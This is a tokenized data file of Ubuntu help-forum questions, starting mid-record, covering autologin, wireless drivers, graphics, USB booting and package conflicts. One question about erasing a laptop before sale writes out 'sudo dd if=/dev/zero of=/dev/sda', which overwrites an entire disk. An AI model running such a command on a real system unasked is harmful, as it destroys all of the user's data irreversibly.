autoremove sudo do-release-upgrade please ask for any information needed more .
359522	lubuntu 13.04 minimal auto-login deos n't work	i have install lubuntu 13.04 minimal on an old netbook . i would like to use autologin . i have changed the first lines of /etc/lxdm/default.conf to the following : autologin=arthur timeout=3 session=/usr/bin/startlubuntu-netbook but it does n't change anything . everytime i start the netbook i have to choose my user and enter the password . thanks ! regards , arthur
359524	facebook does n't remember empathy as trusted `` computer '' when notifications enableb on fb	on facebook i have email notifications enabled when a new `` computer '' ( read : new browser/app ) logins on my account . for few months i 've had these notifications every single time i go online on empathy . i should get the notification only once for a single browser/app on a computer . is there a solution for this ? yes , easy solution is to disable notifications on facebook , but i 'd like to keep myself alerted if someone else is trying to login to my account . there is no issue on my smartphone ( nokia n9 , which uses telepathy as well ) . no problems with browsers on same pc . ubuntu 12.04 64bit with gnome shell , empathy 3.4.2.3 .
359525	sublime text 2 ca n't be added to the launcher	i 'm running sublime text 2 on 12.04 and the issue that i 'm facing is that it ca n't be added to the unity launcher . i run st2 from the executable file that 's there in it 's folder and as with other apps i right-click the icon and select the add to launcher option . it adds it for then ( although st2 ca n't be launched from the icon on the launcher , strange ) and when i reboot my machine , it 's gone . any ideas as to why this happens ?
359527	set default brightness on lenovo p500	this is a somewhat silly question , and not a major issue , but- by default when i load up ubuntu on my lenovo p500 , the screen brightness is always as it 's lowest setting . now , i type in my password and login with the little i can see , and then i can easily adjust it by to a normal level with the keys . curious if anyone knows a way for me to adjust the default brightness of my computer when i first boot up ? thanks for your help .
359530	google chrome update wo n't install due to unmet dependencies	there was an update for google chrome today , and it was n't installable due to unresolved dependencies . how can i correct this ?
359533	frequent gui pauses in ubuntu 13.04 / unity / intel hd4000	i 'm experiencing very frequent ( and regular ) gui pauses on my system . every 30 seconds ( pretty much exactly ) the gui will freeze for maybe .25 to .5 seconds . the mouse stops moving , keys stop echoing and a stopwatch timer briefly pauses . i 'm using the intel graphics driver available from : https : //download.01.org/gfx/ubuntu/13.04/main i 've looked in a few places and tried a few things for a solution : i 've checked cron and anacron for scheduled processes . i 've disabled background processes ( eg mysql , postgres , apache ) not that these were doing anything anyway i 've checked the following posts and tried the suggestions there : unity gui pauses/freezes for less than a few seconds how to go about troubleshooting frequent system pauses i 've watched the system using top and system monitor and there are no spikes ( or even blips ) of cpu usage when the pauses occur . there are no obvious error messages in dmesg or syslog there is loads of free ram ( 8gb+ ) and no swap usage if it helps it 's a zoostorm i5 laptop with a hd4000 gpu , 16gb ram and an ssd . any help / suggestions would be very gratefully received .
359538	how to bring up wireless after it sometimes goes down on reboot ( wlan0 up gives error ) ?	i run ( k ) ubuntu 12.10/12.04 in a triple boot with windows 7 and access the intenet wirelessly . this works perfectly most of the time . sometimes after a normal reboot , the wireless connection dissapears . in ubuntu , it manifests itself in `` device not ready '' being shown in network manager , and in kubuntu , the wlan interface is `` unavailable '' in the corresponding kde network manager widget . normally , when available , my wireless connection 's ssid is displayed and i automatically get connected to it . at this point , the only thing that helps me get back the wireless is booting in and out of windows 7 and then back to ( k ) ubuntu . however , i would like to be able to fix the problem without having to rely on windows 7 being there . below are some relevant command outputs i 've used for debugging : user @ user-desktop : ~ $ lspci -nnk | grep -ia2 net 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : hewlett-packard company device [ 103c:2a9c ] kernel driver in use : r8169 -- 04:00.0 network controller [ 0280 ] : ralink corp. rt3090 wireless 802.11n 1t/1r pcie [ 1814:3090 ] subsystem : lite-on communications inc device [ 11ad:6632 ] kernel driver in use : rt2800pci user @ user-desktop : ~ $ lsmod module size used by parport_pc 32689 0 ppdev 17074 0 bnep 18141 2 binfmt_misc 17501 1 rfcomm 46620 0 bluetooth 209438 10 bnep , rfcomm nvidia 9367981 38 arc4 12530 2 rt2800pci 18529 0 rt2800lib 58731 1 rt2800pci crc_ccitt 12708 1 rt2800lib rt2x00pci 14519 1 rt2800pci snd_hda_codec_realtek 78147 1 rt2x00lib 54995 3 rt2800pci , rt2800lib , rt2x00pci snd_hda_intel 33492 3 mac80211 535936 3 rt2800lib , rt2x00pci , rt2x00lib snd_hda_codec 134213 2 snd_hda_codec_realtek , snd_hda_intel coretemp 13401 0 snd_hwdep 17699 1 snd_hda_codec gpio_ich 13384 0 cfg80211 206797 2 rt2x00lib , mac80211 snd_pcm 96668 2 snd_hda_intel , snd_hda_codec kvm_intel 132760 0 snd_seq_midi 13325 0 snd_rawmidi 30513 1 snd_seq_midi kvm 414111 1 kvm_intel eeprom_93cx6 13345 1 rt2800pci snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61555 2 snd_seq_midi , snd_seq_midi_event psmouse 100424 0 joydev 17458 0 lpc_ich 17062 0 i7core_edac 23572 0 mei 40691 0 snd_timer 29426 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq mac_hid 13206 0 serio_raw 13216 0 lp 17760 0 snd 78921 15 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device edac_core 52452 3 i7core_edac parport 46346 3 parport_pc , ppdev , lp wmi 19071 0 microcode 22804 0 soundcore 15048 1 snd snd_page_alloc 18485 2 snd_hda_intel , snd_pcm hid_sony 12795 0 hid_generic 12541 0 usb_storage 48839 0 usbhid 46987 0 hid 100411 3 hid_sony , hid_generic , usbhid firewire_ohci 40402 0 firewire_core 64369 1 firewire_ohci crc_itu_t 12708 1 firewire_core ahci 25721 2 r8169 61671 0 libahci 31192 1 ahci user @ user-desktop : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr aa : aa : aa : aa : aa : aa up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:18 errors:0 dropped:0 overruns:0 frame:0 tx packets:18 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1284 ( 1.2 kb ) tx bytes:1284 ( 1.2 kb ) wlan0 link encap : ethernet hwaddr aa : aa : aa : aa : aa : aa broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) user @ user-desktop : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : off user @ user-desktop : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no user @ user-desktop : ~ $ sudo iwlist scan eth0 interface does n't support scanning . lo interface does n't support scanning . wlan0 interface does n't support scanning : network is down user @ user-desktop : ~ $ sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 03 serial : aa : aa : aa : aa : aa : aa size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168d-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:45 ioport : d800 ( size=256 ) memory : fbdff000-fbdfffff memory : f6ffc000-f6ffffff memory : fbdc0000-fbddffff *-network disabled description : wireless interface product : rt3090 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : aa : aa : aa : aa : aa : aa width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.5.0-41-generic firmware=0.34 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : fbff0000-fbffffff i 've tried to bring the wireless up manually with : sudo ifconfig wlan0 up and got the following output : siocsifflags : input/output error i 've found the following entries in syslog interesting ( logged when a boot results in a non-functional wireless ) : oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > networkmanager ( version 0.9.6.0 ) is starting ... oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > read config file /etc/networkmanager/networkmanager.conf oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > wext support is enabled ... oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : init ! oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : update_system_hostname oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scpluginifupdown : management mode : managed oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:1c.0/0000:02:00.0/net/eth0 , iface : eth0 ) oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:1c.0/0000:02:00.0/net/eth0 , iface : eth0 ) : no ifupdown configuration found . oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:1c.5/0000:04:00.0/net/wlan0 , iface : wlan0 ) oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:1c.5/0000:04:00.0/net/wlan0 , iface : wlan0 ) : no ifupdown configuration found . oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lo , iface : lo ) oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/lo , iface : lo ) : no ifupdown configuration found . oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : end _init . oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > loaded plugin ifupdown : ( c ) 2008 canonical ltd. to report bugs please use the networkmanager mailing list . oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > loaded plugin keyfile : ( c ) 2007 - 2010 red hat , inc. to report bugs please use the networkmanager mailing list . oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : ( 18924336 ) ... get_connections . oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : scplugin-ifupdown : ( 18924336 ) connections count : 0 oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : keyfile : parsing xxx ... oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : keyfile : read connection 'xxx' oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : keyfile : parsing yyy ... oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : keyfile : read connection 'yyy' oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : keyfile : parsing zzz ... oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : keyfile : read connection 'zzz' oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > modem-manager is now available oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . ... oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > found wifi radio killswitch rfkill0 ( at /sys/devices/pci0000:00/0000:00:1c.5/0000:04:00.0/ieee80211/phy0/rfkill0 ) ( driver ( unknown ) ) oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > wifi enabled by radio killswitch ; enabled by state file oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > wwan enabled by radio killswitch ; enabled by state file oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > wimax enabled by radio killswitch ; enabled by state file oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > networking is enabled by state file oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < warn > failed to allocate link cache : ( -10 ) operation not supported oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( eth0 ) : carrier is off oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( eth0 ) : new ethernet device ( driver : 'r8169 ' ifindex : 2 ) oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( eth0 ) : exported as /org/freedesktop/networkmanager/devices/0 oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( eth0 ) : now managed oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( eth0 ) : bringing up device . oct 15 19:29:57 user-desktop cron [ 1172 ] : ( cron ) startup ( fork ok ) oct 15 19:29:57 user-desktop cron [ 1172 ] : ( cron ) info ( running @ reboot jobs ) oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( eth0 ) : preparing device . oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( eth0 ) : deactivating device ( reason 'managed ' ) [ 2 ] oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( wlan0 ) : using nl80211 for wifi device control oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < warn > ( wlan0 ) : driver supports access point ( ap ) mode oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( wlan0 ) : new 802.11 wifi device ( driver : 'rt2800pci ' ifindex : 3 ) oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( wlan0 ) : exported as /org/freedesktop/networkmanager/devices/1 oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( wlan0 ) : now managed oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( wlan0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] oct 15 19:29:57 user-desktop networkmanager [ 1083 ] : < info > ( wlan0 ) : bringing up device . ... oct 15 19:29:59 user-desktop kernel : [ 31.050638 ] phy0 - > rt2800_wait_wpdma_ready : error - wpdma tx/rx busy [ 0x00000068 ] . ... oct 15 19:30:00 user-desktop networkmanager [ 1083 ] : < info > ( wlan0 ) : deactivating device ( reason 'managed ' ) [ 2 ] ... oct 15 19:30:00 user-desktop networkmanager [ 1083 ] : < info > wpa_supplicant started oct 15 19:30:00 user-desktop kernel : [ 32.647940 ] phy0 - > rt2800_wait_wpdma_ready : error - wpdma tx/rx busy [ 0x00000068 ] . oct 15 19:30:00 user-desktop kernel : [ 32.647949 ] phy0 - > rt2800pci_set_device_state : error - device failed to enter state 4 ( -5 ) . oct 15 19:30:00 user-desktop kernel : [ 32.648045 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready also , the following is logged each time i try to bring wlan0 up : oct 15 19:40:09 user-desktop kernel : [ 519.848361 ] phy0 - > rt2800_wait_wpdma_ready : error - wpdma tx/rx busy [ 0x00000068 ] . oct 15 19:40:11 user-desktop kernel : [ 521.445718 ] phy0 - > rt2800_wait_wpdma_ready : error - wpdma tx/rx busy [ 0x00000068 ] . oct 15 19:40:11 user-desktop kernel : [ 521.445724 ] phy0 - > rt2800pci_set_device_state : error - device failed to enter state 4 ( -5 ) . observations : 1 . wireless appears to be lost randomly sometimes on a reboot ( both after installing some updates and also when none were installed before the reboot ) 2 . when it is lost in one of the ( k ) ubuntu 's , it is also unavailable in the other one after booting into it 3 . the only thing that brings back the wireless is rebooting into windows 7 and back how can i re-enable my wireless in this case ?
359540	securely erase hard drive using the disk utility	i am planning on selling my laptop . so i formatted my disk using the disk utility and chose to overwrite the disk with zeroes . two questions : is this the same as overwriting the disk using dd ? sudo dd if=/dev/zero of=/dev/sda and is this method secure enough so that buyers ca n't easily recover the previous data ? or should i take additional measures ( like encrypting the disk , destroying the headers , etc . ) ?
359543	how do i keep my wordpress content in a private git repository ?	i have got my wordpress up and running . now i want the wp-content to sync with my private git . how do i modify the following code to include username and password to my private git ? juju set wordpress wp-content=git @ host : path/repo.git my git repo is on codebasehq.com . also it would be nice if i can just version control the plugin and themes directory not the whole wp-content which includes wp-uploads .
359544	set monitor refresh rate	the system : os : linux mint 15 , graphics card : nvidia geforce 9500 gt , drivers : nvidia-310 proprietary drivers . the problem : my monitor has a recommended refresh rate of 60hz , and i want to have it set at that . as stated i 'm using nvidia proprietary drivers and i can set the refresh rate to 60hz either from there or with xrandr , but everything resets after boot or login . at the moment i have automatic login in my account . i put a line in .bashrc where xrandr sets my refresh rate back at 60hz . at boot the system sets the refresh rate correctly , i.e . the login screen has the correct refresh rate set , then , during login , it sets it to 75hz , and , once again , xrandr sets it back to 60hz . this simply prolongs the boot time with 1-2 minutes , which is really not pleasant . the culprit : the thing that caused all this was the installation and starting of tux racer , after which the system started setting the refresh rate at 75hz . i 've had the same problem on ubuntu 13.04 where this started after playing teeworlds , but the result was the same . to note is that this happens only on an account where the game was played , all other accounts do not exhibit such problems . creating a new account would solve this problem , but i 'm not really keen of porting my home folder , having used the system for a while . any help would be highly appreciated . if possible , i would also like an explanation why this happens .
359545	heop with adding a driver via terminal	have a wireless dongle device for which no drivers have been provided for by ubuntu/linux . i can add the driver through the terminal and make it work . i have instructions on how to make it a permanent addition to ubuntu ( 12.04 ) but have no clue of how and what to type in to make this driver permanent and to have it available when i start up the program . my instructions say `` to put the module in the list of loaded modules '' `` just add rtl8192cu in /etc/modules-load.d/modules.conf '' and add the following command to /etc/rtc.local : echo `` '' 2001 330d '' | sudo tee /sys/bus/usb/drivers/rtl8192cu/new_id '' i 'm not really up on inputting commands into the terminal program to make things happen . any help would be appreciated .
359550	invisible screen after login	after fresh install of ubuntu 13.04 every time when i log in my screen disapears , and i get stuck with black screen with mouse cursor and invisible window ( probably low grafă­cs warning window ) i can interact with it and resize it or even click the okay button but it still keeps being black . is there any possibility to fix it ?
359554	enable the 3rd and 4 level of keyboard does not work	i need the 3rd 4 keyboard level . i do set this at the keyboard layout settings but without any results ? i have also edit et .xmodmap : clear mod3 add mod3 = alt_left no results how can i get the 3rd 4 keyboard level ? ( ubuntu 12.04 on macbook air )
359555	a lot of lag on ubuntu 12.10	so just recently i had to update to 12.10 because i had a problem with there being no dashboard only wallpaper when i would log in , so my question was answered and it was fixed . now my computer has been lagging a lot more than it used to . i 'm not sure how to fix this . ( if anyone wants to see the question of the old problem here 's the link .
359556	how do i access my linux and windows xp computers from my ubuntu 13.04 computer ?	the ubuntu 13.04 computer is connected by cable to a linksys e1200 router for internet access . the linux computer and the win xp pc access the internet by wireless to the router . how do i access the win xp and linux boxes from the ubuntu 13.04 computer ?
359558	windows 7 usb does n't appear in bios ?	i am running ubuntu 13.04 and i downloaded a windows 7 pro iso file and created a bootable usb with it using unetbootin . my boot order is set to have usb first , but when i try to boot from the usb , it does n't recognize it . i thought maybe the problem was the usb , so i tried another and still nothing . when i first installed ubuntu , it was through a usb , so i do n't know why it does n't recognize it now . help please ?
359559	help ! my panel in xubuntu disappeared !	was sitting here working on the computer when the power restarted for some reason . when my computer rebooted and i signed back in my top and side panel are missing . all the rest of my desktop seems to be there . i opened a terminal and entered the command : xfce4-panel i got the message : xfce4-panel : there is already and instance running yet neither of my panels are showing up . i have tried logging out and logging back in several times and still no panel . i 'm running xubuntu 12.04 64-bit .
359560	why ca n't navigate to downloads	i am trying to navigate to my downloads folder . i got to /home but no further ... i did cd /home/downloads and /downloads and sudo cd /home/downloads ( i do n't know if the last is correct , but anyway ) and also have set set completion-ignore-case on just to be sure , but still no success .
359561	black screen when loggin in with gnome . ubuntu 12.04	i 've been recently experiencing troubles after login ubuntu 12.04 . after typing the password the whole screen turns black for like 20 secs . oddly enough , after that it turns sort of gray and the mouse shows up so you can move it . as i have some docs on the desktop , i 've noticed that passing the cursor over them 'reveals ' the icons while the rest of the screen stays gray/black . if one tries opening a window , both by clicking on one of this icon or just with alt + ctrl + t , the screen goes back to normal except top bar is not there , moving the cursor to the top left corner wo n't do anything and typing inside the window does n't work ( however the search little box shows up ) . moreover , after all that events described before error message such as ubuntu 12.04 has experienced an internal error and system program problem detected . any guesses about the nature of this problem ? how may i solve it ? i 'd rather not be back to using unity , i do n't like it very much . thanks to everybody !
359566	installing ubuntu from a bootable usb disk	i want to install ubuntu 12.04 on a computer that has no os . how do i do that ? i only see a download version that is for installing when i already have an os . in other words i need to be able to boot from a usb and install ubuntu .
359569	architectures em64t速 , x86-64 , ia32 , ia64 , intel速64 , x86 , amd64 , amd32	which packages should install for architectures em64t速 , x86-64 , ia32 , ia64 , intel速64 , x86 , amd64 , amd32 , mach64 ?
359570	different versions of libstdc++6 on 12.04	after upgrading server 10.04 to 12.04 , i was receiving errors related to lgcc_s while trying to compile with g++ and gcc . there are several versions of libgcc_s installed in /usr/lib/gcc/x86_64-linux-gnu/ , including 4.6 and 4.8 . if i create a symlink to the libgcc_s.so in the 4.6 directory to /usr/lib so its on my path , the compilation gives the error ld : unable to find lgcc_s . if i link the version from the 4.8 folder , everything works . checking the version of libstdc++6 gives apt-cache policy libstdc++6 libstdc++6 : installed : 4.8.1-2ubuntu1~10.04.1 candidate : 4.8.1-2ubuntu1~10.04.1 version table : *** 4.8.1-2ubuntu1~10.04.1 0 100 /var/lib/dpkg/status 4.6.3-1ubuntu5 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages the version of g++ is 4.6.3 . on a clean 12.04 install , only the 4.6 directory is available in /usr/lib/gcc/x86_64-linux-gnu/ . further , the output of apt-cache policy libstdc++6 is libstdc++6 : installed : 4.6.3-1ubuntu5 candidate : 4.6.3-1ubuntu5 version table : *** 4.6.3-1ubuntu5 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status why are the versions of libstdc++6 different after the install ? why does linking the library from the 4.8 directory work but the 4.6 directory does n't ? how can i remove the 4.8 version of libstdc++6 without wrecking its dependencies ( which are pretty much every program on the system ) ? finally , the overarching reason for asking these questions is that i 'm trying ( and failing ) to build several software packages ( cantera and rdkit ) that are failing at various c++ compiler steps . i want to eliminate the gcc as the source of the problem , and this inconsistency sticks out to me .
359571	permissions setting on a thumb drive	i have ubuntu 12.04 on my laptop . my laptop is a dell insperion . i plugged in a thumb drive 64 gig into the usb drive . about a week later , i plugged in the drive again and it said that i could not write to the disk . it told me that i only had `` read only '' status . i have tried to change the permission to it , but it does n't seem to work . i then bought a 32 gig drive because i needed to transfer some files to my work . i am on a mac os at work . it worked fine . i then i went to plug it into the ubuntu system , it was `` read only '' . i thought that it was maybe the mac os at work . i plugged the drive in the mac , and it works fine . it says that it is a `` read write '' permissions . i do n't know what to do with the ubuntu system . i have upgraded to the 13.04 system and it is doing the same thing . please help ! ! !
359574	how do i find out the kernel version i am running ?	`` the path to previous driver is usually /lib/modules//kernel/net/wireless '' i need this info so i can finish updating my sta broadcom wireless . however , i 'm a noob at ubuntu and i 'm not sure how to find the kernel verision or kernel . i checked the /lib/modules/ and found this : 2.6.27-10-generic 2.6.32-30-generic 2.6.32-34-generic 2.6.32-38-generic 2.6.27-7-generic 2.6.32-31-generic 2.6.32-35-generic 3.2.0-54-generic 2.6.28-19-generic 2.6.32-32-generic 2.6.32-36-generic 3.2.0-54-generic-pae 2.6.31-23-generic 2.6.32-33-generic 2.6.32-37-generic another question . is there a snippet so i do n't have to cut and paste ? thanks for your time ! : )
359579	why is the monitor 's backlight turning off , when i use the intel速 sandybridge mobile drivers ?	recently , i have installed ubuntu on my acer aspire notebook . everything works flawlessly , except for the graphics card . for example when i try to watch movies they run at a much lower frame rate than in windows . i suspect the system is running in vga mode . therefore i checked the boot options with cat /proc/cmdline , and it seems nomodeset is activated . however , if i try to remove that , the display turns off .
359581	high temperatures on notebook with nvidia graphics	i 've installed ubuntu 13.10 rc and now i 'm experiencing some high temperatures ( i experienced this on 13.04 as well ) . the temps are higher with 10-15c than their equivalents on windows . my notebook is a sony vaio s with nvidia graphics 640m le . these temps are as high immediately after installation with zero load . i tried installing nvidia-current and nvidia-settings which after a restart , when i logged in i was presented with a black desktop with just the cursor . after i uninstalled the nvidia packets and did a clean with auto-remove when i tried logging in again , instead of being redirected to the desktop it kept redirecting me to the login again . btw , i tried checking the additional drivers and it did n't suggest any proprietary drivers to install . does anyone have any suggestions with regards to these temps with that model of the nvidia card ? if possible i 'd like to permanently use the intel card . thanks .
359582	problem associating file type to application	i 'm trying to make gpxviewer the default application to open .gpx files . the problem is that it does n't appear in the `` open with '' window neither i can add it . what i have tried : using ubuntu tweak as recommended here . it does not work for me because there is no `` xml file '' or `` application/xml '' option ( .gpx files are recognized as xml files , which is correct ) . adding `` mimetype=application/xml '' to the gpxviewer launcher ( stored in /usr/share/applications/gpxviewer.desktop ) . still gpxviewer does not appear as an option to open this kind of files . so how can i make this work ?
359583	why do i keep getting the message network autoconfiguration failed	i am unable to install because it says my network is not using the dhcp protocol . i have no idea what that is . there is currently no os on my computer as i have a brand new hard drive . i am connected to the internet via cable .
359584	warning : dos-compatible mode is deprecated	i am running into a problem while creating a usb drive with downloaded *.iso image in windows , using universal usb installer : i copied the ubuntu-10.04.3-desktop-amd64.iso using universal usb installer from windows . it 's in w95 fat32 format . when i am running fdisk /dev/sdc1 ( got the device # from fdisk -l ) , there is a warning : dos-compatible mode is deprecated . q1 > > > if the dos-compatibility is removed will i run into some problem again reusing this device in windows ? q2 > > > if i install my *.iso image using windows , can i reboot in ubuntu from this usb device ? ( see the usb drive partition table given below . none of the partitions are bootable . is there a way to make usb drive bootable ? ) there is some suggested method of making two partition in 1 gb usb drive - fat 32 primary partition ( around 750mb ) , `` casper-rw '' ext2 persistence partition ( rest ) as mentioned under method 3 of the link below : https : //wiki.ubuntu.com/liveusbpendrivepersistent q3 > > > but , i am confused whether this method suggests the same thing as what i did with universal usb installer in windows ? q4 > > > how will i install bootloader afterwards in my usb drive ? or is it already installed ? ( from the usb partition table below , it seems bootloader is not installed ) these are the drive and partition informations that i have : this is the partition information of my usb device after copying *.iso image using universal usb installer . none of the partitions seems bootable which means i wo n't be able to boot from this usb device . how to make it bootable ? root @ somnath-laptop : / # fdisk /dev/sdc1 warning : dos-compatible mode is deprecated . it 's strongly recommended to switch off the mode ( command 'c ' ) and change display units to sectors ( command 'u ' ) . command ( m for help ) : c dos compatibility flag is not set command ( m for help ) : p disk /dev/sdc1 : 1998 mb , 1998291456 bytes 62 heads , 62 sectors/track , 1015 cylinders units = cylinders of 3844 * 512 = 1968128 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x20ac7dda this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdc1p1 ? 838840 951450 216435558+ 7 hpfs/ntfs /dev/sdc1p2 ? 851203 1359387 976730017 16 hidden fat16 /dev/sdc1p3 ? 1 1 0 6f unknown /dev/sdc1p4 13060 253522 462167897 0 empty partition table entries are not in disk order my usb drive contents are as follows : root @ somnath-laptop : /media/usb # ls autorun.inf casper-rw install license.txt pics preseed syslinux uni-usb-installer-copying.txt wubi.exe casper dists ldlinux.sys md5sum.txt pool readme.diskdefines ubuntu uni-usb-installer-readme.txt and the syslinux/text.cfg is as follows . do i need to make any changes to my text.cfg file as suggested in https : //wiki.ubuntu.com/liveusbpendrivepersistent ? default live label live menu label ^run ubuntu from this usb kernel /casper/vmlinuz append noprompt cdrom-detect/try-usb=true persistent file=/cdrom/preseed/ubuntu.seed boot=casper initrd=/casper/initrd.lz splash -- label live-install menu label ^install ubuntu on a hard disk kernel /casper/vmlinuz append cdrom-detect/try-usb=true file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity initrd=/casper/initrd.lz splash -- label memtest menu label test ^memory kernel /install/mt86plus label hd menu label ^boot from first hard disk localboot 0x80
359585	no access to delete files within /tmp	i 've deleted a similar posting i made to clarify this issue so it 's not a double post . my /tmp folder is full of random files . my actual storage space is fine but because there literally hundreds of thousands of these little files , before long i 'll get errors due to the sheer number of files . i 've tried various options like running cron and various sudo rm file* but after i installed midnight commander and tried to delete , i received this note : '' shell commands will not work when you are on a non-local file system '' so , how do i get local ? i 've been trying via the terminal command line on mac , then i tried all the same things via vmware but no go . i tried straight linux commands as well as using midnight commander . with the pure linux i had no errors nor indication that rm was n't working until i ran another ll commmand and saw the files so at least i received that note above from midnight commander . my permissions are set the same as the testing/dev server which is identical to the live server where i 'm having problems but its /tmp folder is clean .
